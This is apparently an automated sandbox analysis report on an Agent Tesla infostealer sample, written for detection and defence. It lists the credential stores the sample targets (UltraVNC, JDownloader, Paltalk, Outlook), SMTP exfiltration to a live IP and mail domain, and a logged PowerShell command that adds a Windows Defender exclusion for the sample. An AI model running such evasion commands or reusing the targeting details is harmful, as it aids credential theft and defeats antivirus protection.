                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd2
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd2
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: UltraVNC
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: ProgramFiles(x86)
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: passwd2
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: JDownloader 2.0
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: JDownloader 2.0\cfg
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Paltalk
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpackString decryptor: nickname
                      Source: QFEWElNtpn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QFEWElNtpn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.6:49710 -> 199.79.62.115:587
                      Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.6:49710 -> 199.79.62.115:587
                      Source: global trafficTCP traffic: 192.168.2.6:49710 -> 199.79.62.115:587
                      Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                      Source: global trafficTCP traffic: 192.168.2.6:49710 -> 199.79.62.115:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                      Source: QFEWElNtpn.exe, 00000007.00000002.3360471462.000000000325A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                      Source: QFEWElNtpn.exe, 00000000.00000002.2138905125.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8X
                      Source: QFEWElNtpn.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_018641407_2_01864140
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_01864D587_2_01864D58
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_018644887_2_01864488
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B51CB07_2_06B51CB0
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B539187_2_06B53918
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B954D07_2_06B954D0
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B9AA407_2_06B9AA40
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B94BB07_2_06B94BB0
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B980D87_2_06B980D8
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B988607_2_06B98860
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B991187_2_06B99118
                      Source: QFEWElNtpn.exe, 00000000.00000002.2138905125.0000000002891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000002.2142022582.0000000003899000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000002.2147971831.0000000007400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000002.2127361524.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000000.2116029205.00000000004B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecHQ.exeD vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000000.00000002.2148961252.00000000076DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000007.00000002.3358747883.00000000012F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exe, 00000007.00000002.3358494452.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exeBinary or memory string: OriginalFilenamecHQ.exeD vs QFEWElNtpn.exe
                      Source: QFEWElNtpn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QFEWElNtpn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.3936bc8.3.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, dUumpmMWlVO6pvN5pa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, A4su3Q2v3YqSgfwv5k.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, dUumpmMWlVO6pvN5pa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/6@1/1
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QFEWElNtpn.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_reoyjghr.oj4.ps1Jump to behavior
                      Source: QFEWElNtpn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: QFEWElNtpn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: QFEWElNtpn.exeReversingLabs: Detection: 73%
                      Source: unknownProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeProcess created: C:\Users\user\Desktop\QFEWElNtpn.exe "C:\Users\user\Desktop\QFEWElNtpn.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: QFEWElNtpn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: QFEWElNtpn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: QFEWElNtpn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation

                      barindex
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, A4su3Q2v3YqSgfwv5k.cs.Net Code: B4UtfZEvaV System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.QFEWElNtpn.exe.3a57400.4.raw.unpack, A4su3Q2v3YqSgfwv5k.cs.Net Code: B4UtfZEvaV System.Reflection.Assembly.Load(byte[])
                      Source: QFEWElNtpn.exeStatic PE information: 0x96A24859 [Mon Jan 31 04:55:53 2050 UTC]
                      Source: C:\Users\user\Desktop\QFEWElNtpn.exeCode function: 7_2_06B91EA0 push es; ret 7_2_06B91EB0
                      Source: QFEWElNtpn.exeStatic PE information: section name: .text entropy: 7.704913820171082
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, tojDhdJKJWq5YFu2tw.csHigh entropy of concatenated method names: 'lr8AZG0W0j', 'qbxAEDqTI7', 'tskA4gxlmg', 'mW0A9g9bDC', 'V1yA3BuatJ', 'nxFAvnJcPC', 'tVgA2KCx3d', 'OuhAHFDYU1', 'bsXASHbIqV', 'tASAmBnmn6'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, BRX4xXq5GbNr2cZufi.csHigh entropy of concatenated method names: 'stKkC00k1Z', 'mUakoGiBVQ', 'Ntnkt7Tar2', 'DxPkZj6eNw', 'fuFkEejHVF', 'Fnfk9Ln2gy', 'z2Fk3EC2vl', 'flWA0pEtfo', 'UTcAJYSbQo', 'yfMAXWNovx'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, Il89MfOJKLE6DrtM41.csHigh entropy of concatenated method names: 'w3c58ZAIZC', 'CiY51QZbNG', 'Ux65OCrLnL', 'r8657vf9dD', 'aW95y2UI0P', 'Ug05DAuph3', 'UBI5GpQ5LP', 'jbk5lKnC0W', 'jR35n56RTX', 'noc5BM04hE'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, Nye9wkW9fpDhCoIAqh.csHigh entropy of concatenated method names: 'hTQfwyxwK', 'WB164cXX2', 'PP2hNlFuc', 'bmcaFQ3a5', 'dQcNathRt', 'wEswW8jgi', 's3WUT00cDA9tS0DiHX', 'htw0eOKDbaTVkfZwL2', 'FMyAY9xmK', 'sQWboRwdX'
                      Source: 0.2.QFEWElNtpn.exe.7400000.6.raw.unpack, dUumpmMWlVO6pvN5pa.csHigh entropy of concatenated method names: 'jBGEOVUZgP', 'kjuE7NJlBx', 'hITEQx3y2S', 'gQjEcImPZU', 'WQlEPXK8Dg', 'LCuEik0WVF', 'teGE0Ae8hP', 'mQqEJ7eCFB', 'G3yEXbwHuI', 'nAdEq5Hw9m'
